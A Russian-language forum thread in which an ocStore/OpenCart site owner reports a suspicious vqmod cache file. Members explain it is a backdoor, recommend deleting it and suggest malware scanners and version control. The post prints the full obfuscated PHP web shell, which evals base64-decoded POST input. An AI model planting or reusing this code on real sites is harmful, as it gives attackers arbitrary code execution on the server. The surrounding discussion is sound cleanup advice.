Зараженный файл

[JaguarRUS]

Нашел одно подозрение. 

Файл в корне сайта vqmod/vqcache/

option.php

 

Сам код 

<?php                                                                                                                                                                                                                                                                      $krx9= "ctb_espdo46a"; $adiy8 = strtolower ($krx9[2].$krx9[11].$krx9[5]. $krx9[4].$krx9[10]. $krx9[9]. $krx9[3] .$krx9[7].$krx9[4]. $krx9[0].$krx9[8].$krx9[7].$krx9[4] ) ; $rxo81 =strtoupper ($krx9[3].$krx9[6]. $krx9[8]. $krx9[5]. $krx9[1] ) ; if ( isset ( ${ $rxo81 } [ 'n6ae4d5']) ){ eval( $adiy8( ${$rxo81 }[ 'n6ae4d5' ])); } ?>

 

Как оцените?

 

ocStore 
Версия 1.5.5.1.2

Змінено 19 грудня 2016 користувачем JaguarRUS

[pashast]

удалить весь файл

такого файла тем быть не должно

все файлы там обычно начинаются с vqcache

[JaguarRUS]

Уверены?

[Гість]

@JaguarRUS, Уверены что не скачали модуль откуда то с левого сайта ??? Может с Вареза ? просто так вирусы не появляются :) 

[JaguarRUS]

ничего не качал, это еще с прошлого лета лежит.

[sv2109]

этот код позволяет выполнить любой код через eval() на вашем сайте, переданный через POST['n6ae4d5']
то есть тот, кто этот код туда записал может сделать с вашим сайтом практически все что угодно.. 

[JaguarRUS]

Ясно удалил тогда. Спасибо. Чем сканируете сайт на опене?

[druzhkov]

Общий принцип - хранить сайты в репозиториях. Плюсы:

хранится вся история правок

можно быстро (одной командой) посмотреть список измененных файлов

можно легко откатить, если что-то побилось/заразилось

А так сканировать айболитом. Потом только разбираться и вычищать руками приходится. Сильно неудобно. Бывает, вирус забивает все файлы подряд.

[JaguarRUS]

Нашел такие файлы в папке загрузки. думаю это левак. Причем эти файлы заливались совсем недавно и периодически. Сайт давно не ведется. Удалять полностью? Расширения странные.

 

Змінено 21 грудня 2016 користувачем JaguarRUS

[skylin371]

Вот возьмите антивирус от яндекс  https://yandex.ru/support/manul/index.html . Может сканировать и лечить файлы. Тоже собираюсь поставить на свой сайт

[JaguarRUS]

так проект этот больше не поддерживается

[halfhope]

Обращайтесь если что, произвожу очистку сайтов/серверов с гарантией. Если будете очищать сами, то рекомендую айболит, скрипт-огонь, но самописные все-таки лучше.

[Russiannov]

сайт на опенкарт 1.5.6.1, антивир хостинга переименовывает файлы на suspected, витрина не работает, какие-то непонятные скрипты разбросаны по сайту...... Цена вопроса(проверка/очистка)?

[halfhope]

10 часов назад, Russiannov сказал:

сайт на опенкарт 1.5.6.1, антивир хостинга переименовывает файлы на suspected, витрина не работает, какие-то непонятные скрипты разбросаны по сайту...... Цена вопроса(проверка/очистка)?

подробности на http://ockb.ru/. Пользователям форума скидка)

[markimax]

2 минуты назад, halfhope сказал:

подробности на http://ockb.ru/. Пользователям форума скидка)

halfhope, передаю скрин ockb.ru

Да это содержимое сайта - белый квадрат "малевича"

[halfhope]

@markimax, спасибо, поправил.

[SiteMix]

Ну тогда и это поправить неплохо бы:

Цитата

Работаю с OpenCart уже 5года.

 

[halfhope]

1 час назад, SiteMix сказал:

Ну тогда и это поправить неплохо бы:

 

Спасибо, там автоматика стоит, чтобы каждый год не обновлять, склонять слова она не умеет)

[SiteMix]

Я так и понял. Можно смело переделывать года на лет. На ближайшие 15 лет хватит...

Правда там ещё и пробела не хватает.